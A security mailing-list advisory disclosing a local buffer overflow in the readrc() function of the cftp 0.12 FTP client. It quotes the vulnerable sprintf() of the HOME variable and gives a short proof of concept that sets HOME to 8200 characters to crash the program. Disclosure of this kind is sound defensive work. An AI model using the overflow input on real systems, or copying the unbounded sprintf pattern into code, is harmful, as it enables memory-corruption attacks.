[VulnWatch] cftp 0.12 (readrc) Local buffer overflow vulnerability



Description:

CFTP is Comfortable FTP, a full screen ftp client.
Supported are FTP both with active and passive data connections,
IPv4 and IPv6, and SFTP (a file transfer protocol using SSH for
authorization and connection encryption).
Found local buffer overflow in readrc() with sprintf() with no
sizelen control.
source: http://ftp.giga.or.at/pub/nih/cftp/

Source error:

int
readrc(char **userp, char **passp, char **hostp, char **portp, char **wdirp,
int check_alias)
{
FILE *f;
char b[8192], *p, *tok, *q, *home;
char *user, *pass, *host, *port, *wdir;

if ((home=getenv("HOME")) == NULL)
home = "";
sprintf(b, "%s/.cftprc", home);

if ((f=fopen(b, "r")) == NULL) {
if (errno == ENOENT)
return 0;
return -1;
}
[..]
}

error in sprintf(), no sizelen control in getenv().

Proof of concept:

$ export HOME=`perl -e "print 'A'x8200"`
$ cftp
Segmentation fault
$

--
.original http://intel.shacknet.nu/
~ starcadi



Relevant Pages

  • [Full-disclosure] cftp 0.12 (readrc) Local buffer overflow vulnerability
    ... CFTP is Comfortable FTP, ... Supported are FTP both with active and passive data connections, ... and SFTP (a file transfer protocol using SSH for ...
    (Full-Disclosure)
  • Re: File Transfer conundrum
    ... the files to XMIT format and then FTP that file down to a PC/workstation ... attached to the host network. ... Subject: File Transfer conundrum ... I'm the original poster, and yours is an intersting thought. ...
    (bit.listserv.ibm-main)
  • Re: File Transfer conundrum
    ... Try a suffix of '.BIN' on all files transferred as well as the 'BIN' FTP ... Subject: File Transfer conundrum ... I also have to deal with the issue that EITHER the EBCDIC code pages on ... some data corruption due to the translation. ...
    (bit.listserv.ibm-main)
  • Re: FTP or SMS?
    ... Subject: FTP or SMS? ... Below is the output of a file transfer of a file that is over 7 GB. ... The DASD Pool contains 8 volumes, allows files to span 2 volumes, had over ... 125 Storing data set ABC,XYZ065.FTPABC.DATA ...
    (bit.listserv.ibm-main)
  • Re: Secure FTP Server software vendors
    ... Tunnel regular FTP in an SSH connection. ... Use a Linux box as a file transfer gateway for z/OS. ... For IBM-MAIN subscribe / signoff / archive access instructions, ... send email to listserv@xxxxxxxxxxx with the message: GET IBM-MAIN INFO ...
    (bit.listserv.ibm-main)